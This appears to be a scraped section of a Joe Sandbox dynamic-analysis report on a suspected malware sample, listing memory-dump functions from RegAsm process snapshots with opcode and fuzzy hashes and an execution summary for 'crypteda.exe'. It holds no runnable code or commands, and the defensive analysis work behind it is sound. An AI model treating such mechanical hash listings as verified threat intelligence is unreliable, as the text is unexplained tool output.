Source File: 00000014.00000002.2112054564.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_67a0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b469bf3a060d5e7d86aafd931f07b7abc1217ad9c4baba64dbb381b848c2afd
Instruction ID: 02af59711e1ac0f4caad54ad47d9bf93055ba235b8785d00bddedb6b521a8a70
Opcode Fuzzy Hash: 5b469bf3a060d5e7d86aafd931f07b7abc1217ad9c4baba64dbb381b848c2afd
Instruction Fuzzy Hash: 09E0C221719B927B8763A7699D00862BFFDCF8715834440A3E888CBA47EA11EC0583E5

Function 0649E4BF Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2103532336.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6490000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bd62b59eb568544458ad5cb0ab84a5f2280081e2397144f085b894201103c30
Instruction ID: 72a2a8b64328a5fdf50af163d78549792a97fee6cf91ef884f42666efc1af2c4
Opcode Fuzzy Hash: 7bd62b59eb568544458ad5cb0ab84a5f2280081e2397144f085b894201103c30
Instruction Fuzzy Hash: 0BE0DF71E49354EFCB11CF64EC408AE3BB2DB8220272042EAD809DBAA0D6300F159B52

Function 0649EBB8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2103532336.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6490000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfbb4f91884a7b761db61001560e5a3040e7ba9922ce180a6686fbf47dc6599e
Instruction ID: 68144fca76cc46fada20f43bf2117bb62c9888b6ad3da729e501f411ba0704e1
Opcode Fuzzy Hash: bfbb4f91884a7b761db61001560e5a3040e7ba9922ce180a6686fbf47dc6599e
Instruction Fuzzy Hash: 3AE0E23925A254AFC702AA68DC45CAA3F79EB4A610305409AF540CF2A2D621ED22DBB1

Function 067A8BA8 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2112054564.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_67a0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc8c2fbb7cea5fa41460af69e865cd52d228fff291a70251694ad95f1ca2e14e
Instruction ID: 49f4a5c2964d101c84b67bc2464e5cd06816cf062f4816f6e07f04c0fb29a5e1
Opcode Fuzzy Hash: bc8c2fbb7cea5fa41460af69e865cd52d228fff291a70251694ad95f1ca2e14e
Instruction Fuzzy Hash: E9E0C235B04A158BDB083B3DA91807EB7AAEF86212740422AE906E3B40EF3098048785

Function 064991DA Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2103532336.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6490000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f97c7b2a0d17367bf6268468d3e3fbb186964a132733f6683d3a804af4a22aad
Instruction ID: a9009f9fadb6e019a5611c88705f808150ad6ff88f9a21c9e6f8f1373fbd7e6e
Opcode Fuzzy Hash: f97c7b2a0d17367bf6268468d3e3fbb186964a132733f6683d3a804af4a22aad
Instruction Fuzzy Hash: 7BE08671A842045BE795DA9896912567FD6DB89700718896ED81DD3740D922DC028350

Function 06754200 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2110822431.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6750000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2daf15fd6dcda22f941addc0b5399244f980a16748c975981477e824deae6c3
Instruction ID: 83ac71a64127edafe1732f2f9ec6b39d44e507c66b934dbddaeca643fcbd7c17
Opcode Fuzzy Hash: a2daf15fd6dcda22f941addc0b5399244f980a16748c975981477e824deae6c3
Instruction Fuzzy Hash: EDE086712492118FC705DB74C844555FBF5BF0030070549A9D5C5D715AEB70E845DB51

Function 0675BF18 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2110822431.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6750000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 526e820e6d0885245ba90af8e926841c54fb1526b77883f8df313ef71e489b27
Instruction ID: f0b2786a42e1b8dbf3497c0c5c38d366bda15e59c051fddf02bd388290cf3fdf
Opcode Fuzzy Hash: 526e820e6d0885245ba90af8e926841c54fb1526b77883f8df313ef71e489b27
Instruction Fuzzy Hash: 5AD02B317002149BC3142A65A0149AA775BDBC9761B14803AE641C7340DE318C03C7D0

Function 0649AF50 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2103532336.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6490000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c0f4ff1fe78b277a8bc3e254e54508c7bc5ca4700625240cd368ce3957e0ae7
Instruction ID: 62617c21d49861506161e5edcc69cdc502da701d3915173e5bcda867d7d6286b
Opcode Fuzzy Hash: 1c0f4ff1fe78b277a8bc3e254e54508c7bc5ca4700625240cd368ce3957e0ae7
Instruction Fuzzy Hash: 2AD05B3170021C5796152765B4184AE779BFBC96623040169E607C7341DE651D0A4BD7

Function 0679C378 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2111952006.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6790000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f32345c9b9849da2dfe47f00efda7fdcc1710ea35906ada013ff6c03fdd041f5
Instruction ID: 02cdcaf3b233327860afe961b6337613196f8270263ba702907349cbc1de88cd
Opcode Fuzzy Hash: f32345c9b9849da2dfe47f00efda7fdcc1710ea35906ada013ff6c03fdd041f5
Instruction Fuzzy Hash: 80E09A74E0420DAFCB54EFA4E45459DBBF5EB84301F4081AAD519A7350DA342A058F85

Function 0679B981 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2111952006.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6790000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17fd41c55fc3591e6efbee412448a29cc21e057357d03f2197768c984709ea6a
Instruction ID: 7af717822e482cd195835f865aa82e308c20e0c0057952d63173baaeb62018ad
Opcode Fuzzy Hash: 17fd41c55fc3591e6efbee412448a29cc21e057357d03f2197768c984709ea6a
Instruction Fuzzy Hash: 2EE0C2303007159FC714EBACD848C6A77E9EF883153008459F50ACB720CAB0EC018BC0

Function 067AA032 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2112054564.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_67a0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 323b5d9e9fc6d2d310e0d4eb842ed62e5d0d1e7ef37e05982f1adef8e21941aa
Instruction ID: bb955ed08519e106da5b0b9fd2d74f2aef739c762ff7efe36c989b11c06cbf19
Opcode Fuzzy Hash: 323b5d9e9fc6d2d310e0d4eb842ed62e5d0d1e7ef37e05982f1adef8e21941aa
Instruction Fuzzy Hash: 37E0E536A00219CFDF609B84E888BADBB72FB84315F00C096E649E2250DB315998CF50

Function 0649B7E0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2103532336.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6490000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3194c1f9244d9b3f467a32bc14411355ec0d8191ad1c78e4cc3d1b9dcb118a6e
Instruction ID: 84cd2133a28abff34afe2585b094109804a96b50a1a47e7bee058b5e3bc27169
Opcode Fuzzy Hash: 3194c1f9244d9b3f467a32bc14411355ec0d8191ad1c78e4cc3d1b9dcb118a6e
Instruction Fuzzy Hash: 21E09275D0420CEFCB40DFE5E9448DDBBB9FB48204F1082AAD909A3210EB306B55DF80

Function 0679C2A0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2111952006.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6790000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89e71113007bdc3285cf4b67576cecda370ec32dfa59e67c40871e1b12dc9b5f
Instruction ID: 3d9d9b1f44373c59be6fb7def322706e2848a8e7e82c058dd616839eda05b4f7
Opcode Fuzzy Hash: 89e71113007bdc3285cf4b67576cecda370ec32dfa59e67c40871e1b12dc9b5f
Instruction Fuzzy Hash: 1AD0C231D05345CECF52CBA014100B97BA64A87100B0182D78002CB556D8310E448761

Function 0649E540 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2103532336.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6490000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e47ea6723bc8e02f978bfc9e6ae92b942aebaf3582668ae47cdc8a7d1f54154
Instruction ID: ace9526939719b2fcb6f7e951cfe1b288ea36bf983a6bac1384a0672f7caeec5
Opcode Fuzzy Hash: 1e47ea6723bc8e02f978bfc9e6ae92b942aebaf3582668ae47cdc8a7d1f54154
Instruction Fuzzy Hash: B4E08C31A042108FCB46FA10FA4AAA537B2FB88B1CF114158D8021BE68C772295A9BD9

Function 0679C268 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2111952006.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6790000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00f75d5a3e1a9591b6f377160ddbe822c8633d93a22e7851b060461e56cacfe6
Instruction ID: ee4d18ea1625c29cd6ae70e6b058986d96960aad5cda8b0ee6608718a72f9f79
Opcode Fuzzy Hash: 00f75d5a3e1a9591b6f377160ddbe822c8633d93a22e7851b060461e56cacfe6
Instruction Fuzzy Hash: 99E09274E05308AFCB44EFA9D44559DBBF5AB88200F00C0AAD809E3300EA349A40CF84

Function 067A4C50 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2112054564.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_67a0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 937aa279f8a58bc16ab39c510825769a9ac7b31442ce363fc7c41e433c7878eb
Instruction ID: 60fc697bb67ece444c5236a277558e36505fa7d5a55bcc4fcccc73d0e4ae1792
Opcode Fuzzy Hash: 937aa279f8a58bc16ab39c510825769a9ac7b31442ce363fc7c41e433c7878eb
Instruction Fuzzy Hash: 21E01AB0D0020ADFEB60CF90C848BEEBBB5FB84300F104666E41AA3284CB755989CF90

Function 067A7B1F Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2112054564.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_67a0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a5a93d716ef6692d34fd772210701e35ebf8e2e58d131928d4b58331c5f9f8a
Instruction ID: c0990db5ad2aac0a79f728f538f99a8bf9259b2bac9a2d152fbdc8256cf73152
Opcode Fuzzy Hash: 0a5a93d716ef6692d34fd772210701e35ebf8e2e58d131928d4b58331c5f9f8a
Instruction Fuzzy Hash: 52D097203882289FED01AFA4C9183E53B86FB4AB40F4001E4E58D431C2C2228C0EEAE6

Function 067A9807 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2112054564.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_67a0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca8b9496f79f39786778a969ba9424535c93c3b29e9f99a2d40496fb38ea6bda
Instruction ID: 5a2aed3c0bb38d90cfe056c51c50209fee09636ae88afdfc87c0f26f97c85ae2
Opcode Fuzzy Hash: ca8b9496f79f39786778a969ba9424535c93c3b29e9f99a2d40496fb38ea6bda
Instruction Fuzzy Hash: E2D0123010A7945FC342AA348D5089D7F34EED314074545AAD0859B592D621955AD7A1

Function 067AD328 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2112054564.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_67a0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35d84d16877658f26902c1f0bfde2a06482d3f4004178c1fc7ed624705826cec
Instruction ID: ebb379962e8ba04f8bf6f4fd7d92b12649bd603381036101e9a8f5ae8258262a
Opcode Fuzzy Hash: 35d84d16877658f26902c1f0bfde2a06482d3f4004178c1fc7ed624705826cec
Instruction Fuzzy Hash: C4D02231B10306674BA1F67DAA00862B7EECFC61943404072DC08C3B05EE20EC404398

Function 067A8F7F Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2112054564.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_67a0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8283201a54dc040c1aaa92a941f1e8cc34e95cb345133f51219f440951bb55e
Instruction ID: 7a0cd4b59387de04427711aa799f564b24fdc38e8fe72cd98d02e3b3f8d6a5c3
Opcode Fuzzy Hash: d8283201a54dc040c1aaa92a941f1e8cc34e95cb345133f51219f440951bb55e
Instruction Fuzzy Hash: BFD0123128B3A26FC307AA229D3189A7F359A532913164197E049CB5D3C217844AC7F2

Function 0649E4D0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2103532336.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6490000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cc548e91dd8edc3e9df41f6410ee456802597224115844645e4015d439fbda5
Instruction ID: 237e8966a0d1622b9fdaee3ac553dbdc313b0b1ea1b5b8764763aed41b308488
Opcode Fuzzy Hash: 0cc548e91dd8edc3e9df41f6410ee456802597224115844645e4015d439fbda5
Instruction Fuzzy Hash: 5AD01771E00208FF8B40EFA8E9009ADB7BAEB84205B1041A99409E7600EA312E009B95

Function 067AD480 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2112054564.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_67a0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4921a48f1506af1974756a81a6aeffad3babfd22e9ac20ef096abbc86bb0568
Instruction ID: a44d7660906f99feeb45230faef65a4decaf327094d5415fbec8c6f055f8aa41
Opcode Fuzzy Hash: d4921a48f1506af1974756a81a6aeffad3babfd22e9ac20ef096abbc86bb0568
Instruction Fuzzy Hash: 1BD0C776101214FBCB061F94DC00895BFAAEF1D36971480ADF6095A622C733D473DBD4

Function 0649FBAA Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2103532336.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6490000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15452496918a365382feb297028a09128bea7a30fcb20a8e57aee3641f89ab13
Instruction ID: a9f67b623b4d97d9a15c86c1c931c09ea0647cea671eaf84004104b1fa6992ea
Opcode Fuzzy Hash: 15452496918a365382feb297028a09128bea7a30fcb20a8e57aee3641f89ab13
Instruction Fuzzy Hash: 1CC01272B841311B0288BA6CB4180AD66D7D2CC6E3386417EE60EC3388DEA09C424784

Function 0679B948 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2111952006.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6790000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5764d72c5e40f8725cef375ab73373581774e577ecd2aa331ccf41df6a542c9c
Instruction ID: dba712d61f2a5e6d5c3f667e64610a7158e3c0eff40adafcf9b0afcc17bc594e
Opcode Fuzzy Hash: 5764d72c5e40f8725cef375ab73373581774e577ecd2aa331ccf41df6a542c9c
Instruction Fuzzy Hash: ABD0A930210A288FC700AB28E4048A87BE9EF4962531080AAF606CB330CAA1AC008BC4

Function 067A829E Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2112054564.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_67a0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a04eae0846f15dc1acb1e037b6260afc1cdb142d767841b7eaa647167feb7e88
Instruction ID: 298777326a11fff3dc2c388839cfcb47616b2f2ef6389f6d4f0525a9c1cdbd51
Opcode Fuzzy Hash: a04eae0846f15dc1acb1e037b6260afc1cdb142d767841b7eaa647167feb7e88
Instruction Fuzzy Hash: 18D02330F001384BC170976574158773AE457C404431C4D16E481DB15CC9144C8383D1

Function 067A8BF8 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2112054564.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_67a0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae634d9e0237d9ba689a8313393d2a600169d88cfef791805f4536a09a8b16d5
Instruction ID: 23bde16d166ac2b3c9dfc3fe7e7219d46f66df624b61e43084d081eca8362919
Opcode Fuzzy Hash: ae634d9e0237d9ba689a8313393d2a600169d88cfef791805f4536a09a8b16d5
Instruction Fuzzy Hash: 06D023309127144FC7705554D14837177D9B744720F00235DD04743940CB7074804FC5

Function 06794833 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2111952006.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6790000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e8a1d2318056ff571e2b7d53cd96c9252ea8e54ba5a94670d47148dcc578fbc
Instruction ID: 0576b70a7e5eaa43c6b6cec78b20fcb3a45cc49eeccd9fb953d31ba35109aa66
Opcode Fuzzy Hash: 2e8a1d2318056ff571e2b7d53cd96c9252ea8e54ba5a94670d47148dcc578fbc
Instruction Fuzzy Hash: D1D0223020AB804FCB235F74AC1CA363FA98B8220170003DBE59AC50E2CB148401CB32

Function 067A43B1 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2112054564.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_67a0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b2778ffacb71d40e309e9d9daaa5a524a3f7315ab4b1d739f668af369305d7b
Instruction ID: f289d599fc6b6f6ef74289c0b06de365cd10dcad9b735f4adb02b3a86a5e007b
Opcode Fuzzy Hash: 2b2778ffacb71d40e309e9d9daaa5a524a3f7315ab4b1d739f668af369305d7b
Instruction Fuzzy Hash: 3DC08C0024E3D22FD70367A44C01B2A3E208783A80F8600C29180CB4E3C41A9806C3EB

Function 0679C2B0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2111952006.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6790000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc480c5508d20193c38590beb3d8e3643feb45c81c3d060dc2a78c203f022abd
Instruction ID: 972ece086ce1b6f50b9c7b8b46bd3a7f9b48696f0a1ca16042a0cba9cafda076
Opcode Fuzzy Hash: dc480c5508d20193c38590beb3d8e3643feb45c81c3d060dc2a78c203f022abd
Instruction Fuzzy Hash: 6FC08C31A0030DAB8B10DFE588016AEBBEEDA43100B1083D5890BC7204ED329F1046E2

Function 06794840 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2111952006.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6790000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 068460f73f4897f1181951e18033d1c52d6fc0a8891e189fef1c4a6932479241
Instruction ID: 4c6564961de4600ca94e7b405fa03aeed73351fbff09ffbed9287ebfa2ac0fd2
Opcode Fuzzy Hash: 068460f73f4897f1181951e18033d1c52d6fc0a8891e189fef1c4a6932479241
Instruction Fuzzy Hash: C9C08C312055084BEB405FB0790C326378DC780202B0040A6E20DC0040EF1888008961

Function 067A2D80 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2112054564.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_67a0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69f7cb9feff7f8ac8004c168d4f19b8ad78a607ba93ba7f0647ce087975f57a6
Instruction ID: 20c6e0fca9c33d3de107e4e00ab7b96158fee6cf3eb58acf536255b224af209a
Opcode Fuzzy Hash: 69f7cb9feff7f8ac8004c168d4f19b8ad78a607ba93ba7f0647ce087975f57a6
Instruction Fuzzy Hash: E4C080B1D062C05FCF01CB604C448837B756E4A20433180C5BD45C7112D124CD1BC7B2

Function 0679B50F Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2111952006.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6790000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6d8355f8229602877d9d6a1df389033c38f85295d8b29034de15815a7bc5851
Instruction ID: f513e730915174d79d340f3a66e84e0cceaefd0857047ee9d8050609bd21c9c7
Opcode Fuzzy Hash: a6d8355f8229602877d9d6a1df389033c38f85295d8b29034de15815a7bc5851
Instruction Fuzzy Hash: 20C0123245460C8FC700BA68E8058997F7CBF55300B004619E44526100EF30A5A5C7A1

Function 0679B4E0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2111952006.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6790000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b4eaf01719968d779fc73ce9abcb9ed41c1eaa74ae5e99564be44125b2634b2
Instruction ID: 30bd563ca254c5230c3c4f2bfda5004a740dd90843d5e64d908fe506169c4678
Opcode Fuzzy Hash: 6b4eaf01719968d779fc73ce9abcb9ed41c1eaa74ae5e99564be44125b2634b2
Instruction Fuzzy Hash: 30C0123185460C8FC700BEA8E8048A8BBB8BB55200F40922AE44A2A110EB20A5A9CB91

Function 0679B510 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2111952006.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6790000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 616606f5ced146c064043197467541b454adbacb691243276fb1725dd6df41c6
Instruction ID: b0dda8f62e636c1aa0f43dc53c3a892356554bfbcb692c898ef44b5e6536eb5f
Opcode Fuzzy Hash: 616606f5ced146c064043197467541b454adbacb691243276fb1725dd6df41c6
Instruction Fuzzy Hash: 57C0123285460C8FC700BAA8E8048A8BBB8BF65300B00862AE4452A200EB30A5A9CB91

Function 06493721 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2103532336.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6490000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b35b5a198ba00620c59ad8abdb8d6735e5a60582d089a0a5e87d329be91887e
Instruction ID: db6c8baa6d56ef2f9752ee2afa3c7b7256eba945cc88095d9a0687672d270bfb
Opcode Fuzzy Hash: 0b35b5a198ba00620c59ad8abdb8d6735e5a60582d089a0a5e87d329be91887e
Instruction Fuzzy Hash: E4C02BF3C124402FF30041004D06F097D0087A0300F1B0821D302D508AC551C090C073

Non-executed Functions

Function 06756A60 Relevance: 5.4, Strings: 4, Instructions: 435COMMON

Download Yara Rule

Strings

(q, xrefs: 06756B2D
(q, xrefs: 06756EC0
(q, xrefs: 06756F0F
(q, xrefs: 06756ADE

Memory Dump Source

Source File: 00000014.00000002.2110822431.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6750000_RegAsm.jbxd

Similarity

API ID:
String ID: (q$(q$(q$(q
API String ID: 0-4048435238
Opcode ID: 2d4f6fa51a23509d1303f7f0b50fac4a994cfcb46eb3aeaf9d53998fadfcf332
Instruction ID: b77ab86dc29d26b7bc2462274c0cfe00eeffe79b2a4865e428f13315766c9dcd
Opcode Fuzzy Hash: 2d4f6fa51a23509d1303f7f0b50fac4a994cfcb46eb3aeaf9d53998fadfcf332
Instruction Fuzzy Hash: 94E1EF30B083508FDB599B78D86467D7BB2EF85250F6984A9D806DB3A2DE74DC42CB60

Function 0649EFD0 Relevance: 5.2, Strings: 4, Instructions: 242COMMON

Download Yara Rule

Strings

(_q, xrefs: 0649F03A
(_q, xrefs: 0649F0B9
(_q, xrefs: 0649F239
(_q, xrefs: 0649F1BA

Memory Dump Source

Source File: 00000014.00000002.2103532336.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6490000_RegAsm.jbxd

Similarity

API ID:
String ID: (_q$(_q$(_q$(_q
API String ID: 0-1088526261
Opcode ID: d8fa9f2b2997c0823da9d90b0cf023bac1fcfc21443688606752c9138ef314bc
Instruction ID: 2b9a4787ff08a297d276bd7e35b3547661abfc2d54be38c2fecb515e3559a7bb
Opcode Fuzzy Hash: d8fa9f2b2997c0823da9d90b0cf023bac1fcfc21443688606752c9138ef314bc
Instruction Fuzzy Hash: DC91DE74A043149FDB489F78D8146AE7BB2EFC6250F24846EDD06DB381DA359D06CBE1

Analysis Process: crypteda.exePID: 7352, Parent PID: 7944COMMON

Execution Graph

Execution Coverage:	26.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	20
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
